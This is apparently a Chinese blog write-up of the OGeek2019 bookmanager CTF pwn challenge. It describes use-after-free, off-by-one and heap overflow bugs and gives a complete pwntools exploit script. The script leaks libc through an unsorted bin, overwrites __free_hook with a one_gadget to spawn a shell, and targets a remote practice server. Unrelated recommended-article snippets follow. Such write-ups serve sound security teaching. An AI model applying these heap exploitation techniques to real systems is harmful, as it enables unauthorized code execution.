heap_overflow(OGeek2019-bookmanger50)

最新推荐文章于 2024-02-27 23:52:11 发布
原创 最新推荐文章于 2024-02-27 23:52:11 发布 · 489 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #glibc

本文分析了OGeek2019-bookmanger50中存在的多种漏洞,包括uaf、off-by-one及堆溢出等,并详细介绍了如何利用这些漏洞实现内存泄漏和one_gadget攻击,最终获取shell。

题目:OGeek2019-bookmanger50

保护

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gy2rHTym-1648199452615)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165315445.png)

分析

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3JSoLvKg-1648199452615)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165412444.png)

add_chapter

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-t8pet3Rl-1648199452616)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165433657.png)

add_section

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gH9W4Fjc-1648199452616)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165452794.png)

add_text

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qDGm54uz-1648199452617)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165505763.png)

rm_chapter

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UNBUHGOV-1648199452617)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165516208.png)

rm_section

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-klJ9XTwO-1648199452617)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165525663.png)

rm_text

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RyPG9r1R-1648199452618)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165536035.png)

show

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IjqoQXFC-1648199452618)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165557068.png)

edit

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VPUjcfQP-1648199452619)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165609472.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XNsdVjFY-1648199452619)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165614794.png)

思路

这题的漏洞非常多有uaf,off-by-one,堆溢出因为漏洞太多以至于给我整不会了,ida逆向时看起来挺复杂其实就是一个常规的简单堆题,我在做unsort bin泄漏libc时把堆空间整坏了,做题时我没注意到泄漏方式的问题导致我后面做的怀疑人生,导致花了非常多时间,其实这题非常简单,没有很多常规题的限制

整理出来大概堆空间如下:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-384n83YG-1648199452619)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325170056609.png)

且每个ptr都可以单独申请出来,且漏洞非常多,限制少,就导致这题做法特别灵活.

首先unseat bin泄漏libc

    add('chapter','','0')
    add('section','0','A')
    add('text','A','B',0x90)

    add('section','0','B') #0x40

    dele('section','A') #uaf
    add('text','B','B',0x90) #uaf
    show()
    ru('Text:')
    ru('Text:')
    leak = info(rc(6),'libc') #leak libc
    libc.address =  leak - (0x7ff30239eb42- 0x7ff301fda000) # 0x3c4b78

通过堆溢出即可完成写入one_gadget

edit('Text','B',b'A'*0x98 +p64(0x41)+ p64(0x41)+ p8(0)*0x18+ p64(libc.symbols['__free_hook']))
edit('Text','A',p64(one[1] + libc.address))
dele('chapter','0') #getshell

完整exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
#import sys

#context.terminal = ['terminator', '-x', 'sh', '-c']
#context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
context.arch = 'amd64'
SigreturnFrame(kernel = 'amd64')

binary = "./OGeek2019-bookmanger50"

one = [0x45216,0x4526a,0xf02a4,0xf1147]  #2.23(64)
#idx = int(sys.argv[1])

global p
local = 1
if local:
    p = process(binary)
    e = ELF(binary)
    libc = e.libc
else:
    p = remote("node4.buuoj.cn","29119")
    e = ELF(binary)
    libc = e.libc
    #libc = ELF('./libc_32.so.6')

################################ Condfig ############################################
sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
it = lambda :p.interactive()

def z(s='b main'):
    gdb.attach(p,s)

def logs(mallocr,string='logs'):
    if(isinstance(mallocr,int)):
       print('\033[1;31;40m%20s-->0x%x\033[0m'%(string,mallocr))
    else:
       print('\033[1;31;40m%20s-->%s\033[0m'%(string,mallocr))

def pa(s=1,t='step'):
    log.success('pause : '+ t +'---> '+str(hex(s)))
    pause()

def info(data,key='info',bit=64):
    if(bit == 64):
      leak = u64(data.ljust(8, b'\0'))
    else:
      leak = u32(data.ljust(4, b'\0'))
    logs(leak,key)
    return leak

################################ Function ############################################
def add(ty,i='',c='',t=0x10):
    if ty=='chapter':
        sla('choice:','1')
        sa('name:',c)
    elif ty=='section':
        sla('choice:','2')
        sa('into:',i)
        sa('name:',c)
    elif ty=='text':
        sla('choice:','3')
        sa('into:',i)
        sa('write:',str(t))
        sa('Text:',c)
def dele(ty,i):
    if ty=='chapter':
        sla('choice:','4')
        sla('name:',str(i))
    elif ty=='section':
        sla('choice:','5')
        sla('name:',str(i))
    elif ty=='text':
        sla('choice:','6')
        sla('name:',str(i))

def show():
    sla('choice:','7')
def edit(tr,s,n):
    sla('choice:','8')
    sla(':',tr)
    sa('name:',s)
    sa(':',n)
################################### Statr ############################################
def pwn():
    sla('create:','root') #这里没啥用

    add('chapter','','0')
    add('section','0','A')
    add('text','A','B',0x90)

    add('section','0','B') #0x40

    dele('section','A') #uaf
    add('text','B','B',0x90) #uaf
    show()
    ru('Text:')
    ru('Text:')
    leak = info(rc(6),'libc') #leak libc
    libc.address =  leak - (0x7ff30239eb42- 0x7ff301fda000) # 0x3c4b78

    edit('Text','B',b'A'*0x98 +p64(0x41)+ p64(0x41)+ p8(0)*0x18+ p64(libc.symbols['__free_hook']))
    edit('Text','A',p64(one[1] + libc.address))
    dele('chapter','0')
    p.interactive()
################################### End ##############################################
pwn()
while 0:
    try:
        pwn()
        break
    except (KeyboardInterrupt [KeyboardInterrupt ]):
        p.close()
        #p = process(binary)
        p = remote("node4.buuoj.cn","29728")

远程

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OxR1R3cf-1648199452620)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325170658579.png)

vue项目编译时报错:FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory
Debug的博客
06-28 2015
全局安装 第二步: 打开终端,执行:
Heap overflow堆溢出(一)
「鸿渐之翼」的博客
10-01 4522
堆溢出介绍: 堆溢出是指程序向某个堆块中写入的字节数超过了堆块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为堆管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址......
[OGeek2019]bookmanager
z1r0的博客
04-02 401
[OGeek2019]bookmanager 查看保护 这题的功能多,要审计的代码多,但是漏洞也多,这里笔者就例出笔者getshell所使用的漏洞 可以看到这里在update text的时候可以改0xff大小, 笔者用的最多的就是这里的漏洞。 攻击思路: 1.因为可以改0xff大小所以我们可以借助这个来使得0x91全部填满,在填满之前让下面的0x91释放掉。这样一来垃圾数据就可以直接连接到被释放掉的0x91的fd这里,show一下即可拿到libc。 2.拿到libc之后笔者再次利用了这个漏洞先将下面的
关于Heap Overflow(堆溢出)
krrrr的专栏
05-04 9573
Heap overflow是一种系统提升权限的方法。在Linux系统中,入侵者可以针对某些文件属性设置成+rws(也就是传说中的粘滞位)的漏洞程序进行攻击从而得到root权限。我们在模拟攻击时可以在root权限下使用以下命令来设置粘滞位属性:                             chown root:root xxx                         
PWN · heap | unsorted-bin-attack】hitcontraining_lab14
Mr_Fmnwon的博客
02-27 909
unsorted-bin一般用于利用,有leak libc和往任意地址写一个大数的作用。本题可以说是作为一道模板题,主要阐述了如何实现”往任意地址写一个大数“。一、unsorted只要unsorted-bin中的某个chunk的bk域被修改为指定addr,则addr+0x10(64位)的位置会在该chunk被unlink时,修改为一个非常大的数(该chunk的头部地址)从来没有遇到这么简洁的总结。然而,更好的理解,是需要知道底层过程的(如上,wiki部分)。
溢出科普:heap overflow&溢出保护和绕过
weixin_34320724的博客
03-08 1999
pr0mise · 2016/04/11 9:500x00 第一部分:heap overflow接上文,来看另外一种溢出方式:堆溢出.相对于栈溢出来说,稍微麻烦一点本文算是一个笔记,技术有限,难免有纰漏之处,欢迎诸君斧正.0x01 基础知识一.堆的结构堆为程序运行时主动申请的内存,通常称为堆区,操作堆的api从UserMode来看有:例如malloc申请一块内存会先调用HeapCreate()为自...
FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory
CreeSteve的博客
04-15 8639
这个错误的意思是 JavaScript 堆内存不足。这意味着你的程序尝试使用更多内存,但是电脑上可用的内存不足以满足需求。这种情况通常发生在你的程序中存在内存泄露(memory leak)或者你的程序使用了过多的内存。
mysql max_heap_table_size,更改MySQL中的max_heap_table_size值?
weixin_36080842的博客
03-17 6632
max_heap_table_size是同时具有读/写属性的系统变量。最初,max_heap_table_size的大小为16 MB。首先,检查max_heap_table_size的值(以字节为单位)。查询如下-mysql>select@@max_heap_table_size;以下是输出-+-----------------------+|@@max_heap_table_size...
ptmalloc源码分析 - 分配区heap_info结构实现(05)
热门推荐
自娱自乐的代码人
08-29 3万+
我们讲解了多线程环境下,面对线程之间的竞争,ptmalloc除了主分配区外,还会去创建非主分配区。因为线程在调用malloc的时候,首先会去获取一个分配区,如果当前的分配区都被锁定并且没有新的分配区可用的时候,ptmalloc就会去创建一个新的。中主要是创建一个新的分配区,该分配区主要是非主分配区类型。主分配区在ptmalloc_init中初始化,并且设置了全局变量main_arena的值。(size_t size, size_t top_pad):创建一个新的非主分配区。一、heap_info是什么?
mozilla_nntp_heap_overflow.nasl
11-08
mozilla_nntp_heap_overflow
api-ms-win-core-heap-l2-1-0.dll (64位)
08-14
《API-MS-WIN-CORE-HEAP-L2-1-0.DLL:64位Windows 10系统的关键组件》 在计算机操作系统中,动态链接库(DLL)是实现功能模块化的重要部分,它们允许多个程序共享同一段代码和数据,节省内存并提高效率。"api-ms-...
native_heapdump_viewer.py
07-16
使用方法如下: ...python native_heapdump_viewer.py --symbols symbols 00.txt >00.log python native_heapdump_viewer.py --symbols symbols 01.txt >01.log 对比00.log和01.log,查看内存增长的点
rt-thread源码分析篇八:rt_system_heap_init函数分析
OnlyLove_的博客
08-22 2865
一、前言 rt_system_heap_init被rt_hw_board_init调用。 rt_system_heap_init((void *)HEAP_BEGIN, (void *)HEAP_END); 二、参数分析 #define STM32_SRAM_SIZE 64 #define STM32_SRAM_END (0x20000000 + STM32_SRAM_SIZE * 1024) extern int Image$$RW_IRAM1$$ZI$$Limit; #define HEAP_BEG
Lua非空判断方法[源码]
11-24
本文详细介绍了在Lua中进行非空判断的几种方法,特别是针对table类型的变量。首先,文章指出了直接对nil值进行索引会导致异常的问题,并给出了一个简单的例子来说明如何避免这种情况。接着,文章讨论了如何判断一个table是否为空,指出不能简单地使用`#table == 0`的方式,而是应该使用`next(t) == nil`的方法。此外,文章还提到了`next`指令在LuaJIT中的优化问题,建议在非必要情况下少用。最后,文章简要介绍了如何判断一个字符串是否全部由空格组成,使用了正则匹配的方法。这些内容对于Lua开发者来说非常实用,能够帮助他们避免常见的错误。
JS表格转Excel实现[可运行源码]
11-24
该文章详细介绍了如何使用JavaScript将HTML表格数据导出为Excel文件。内容涵盖了针对不同浏览器的兼容性处理,包括IE和非IE浏览器的不同实现方式。对于IE浏览器,使用ActiveXObject进行导出;对于非IE浏览器,则通过base64编码和数据URI方案实现。文章还提供了完整的代码示例,包括表格数据的处理、格式化和导出功能,支持文本和图片类型的数据导出。
图片转bin文件存储[项目代码]
11-24
本文介绍了在OpenCV项目中如何将大量图片数据转换为二进制(bin)文件进行高效存储和读取的方法。作者在项目中遇到需要处理大量图片数据的问题,尝试了多种格式(如.mat、.txt、.yml)后发现效率较低。通过使用二进制文件存储,显著提升了读写速度。文章详细展示了使用OpenCV将图片写入二进制文件的代码示例,以及从二进制文件读取图片数据的实现方法。虽然该方法需要提前知道图片的尺寸和数量,但读写速度极快,适合处理大量图片数据。作者还提到可以通过换行符或终止符优化读取过程,但未深入探讨。
ROS视觉处理与色彩识别[项目源码]
最新发布
11-24
本文详细介绍了在ROS环境下进行视觉处理的基础步骤,特别是针对色彩识别的实现方法。内容涵盖了从摄像头驱动的安装与配置(如usb_cam驱动和image_view工具的使用),到创建功能包和编写图像处理节点(包括RGB图像回调函数、HSV色彩空间转换、二值化处理及形态学操作)。此外,还演示了如何在仿真环境中获取图像,并通过OpenCV实现红色和绿色物体的识别与追踪。最后,文章提供了完整的代码示例和编译运行步骤,帮助读者快速上手ROS视觉处理项目。
Anaconda安装与使用指南[项目源码]
11-24
本文详细介绍了在Anaconda环境下安装和使用jupyter及numpy的步骤。首先,指导用户如何安装Anaconda并创建虚拟环境,然后详细说明了如何在虚拟环境中安装jupyter和numpy。接着,文章提供了多个numpy的练习示例,包括创建零向量、矩阵操作、归一化等。此外,还介绍了如何在Jupyter中完成numpy、pandas和matplotlib的例题,涵盖了从基础操作到实际应用的多个方面。最后,文章总结了实验过程中的经验,特别是在使用国内镜像源后下载速度的提升。
【动静障碍物】基于JPS算法(改进A)全局路径规划与DWA动态窗口局部避障的机器人自主导航混合控制算法(Matlab代码实现)
11-24
【动静障碍物】基于JPS算法(改进A)全局路径规划与DWA动态窗口局部避障的机器人自主导航混合控制算法(Matlab代码实现)内容概要:本文介绍了一种结合改进A*算法的JPS(跳跃点搜索)全局路径规划与DWA(动态窗口法)局部避障的混合控制算法,用于机器人在动静态障碍物环境下的自主导航。该算法通过JPS优化全局路径搜索效率,提升路径规划速度,并结合DWA实现实时动态避障,增强了机器人在复杂动态环境中的适应性和安全性。整个系统在Matlab平台上进行了代码实现与仿真验证,展示了良好的路径规划效果与避障性能。; 适合人群:具备一定机器人学、自动控制或路径规划基础知识的研究生、科研人员及从事智能机器人开发的工程技术人员。; 使用场景及目标:①应用于移动机器人在静态与动态障碍共存环境中的自主导航任务;②为研究高效全局规划与实时局部避障的融合策略提供技术参考与实现案例;③支持Matlab仿真环境下的算法验证与优化。; 阅读建议:建议读者结合Matlab代码深入理解JPS与DWA的集成逻辑,重点关注算法在路径最优性、计算效率与避障实时性之间的平衡设计,可进一步扩展至多机器人系统或复杂地形场景的应用研究。
/home/shaokunhmao/tonly/item_code/cost-down-s-bar-demo/RK2116/source_code/components/hifi4/rtt/Tonly/11_msg/tonly_msg.c:100:22: error: implicit declaration of function 'rt_heap_used' [-Wimplicit-function-declaration] 100 | rt_size_t used = rt_heap_used(); | ^~~~~~~~~~~~ /home/shaokunhmao/tonly/item_code/cost-down-s-bar-demo/RK2116/source_code/components/hifi4/rtt/Tonly/11_msg/tonly_msg.c:101:21: error: implicit declaration of function 'rt_heap_max' [-Wimplicit-function-declaration] 101 | rt_size_t max = rt_heap_max();
11-13
你遇到的编译错误是因为 `rt_heap_used()` 和 `rt_heap_max()` 函数在 RT-Thread 中并不是所有版本都支持,或者它们所在的头文件没有被包含。 --- ### ✅ 问题分析 `rt_heap_used()` 和 `rt_heap_max()` 是用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值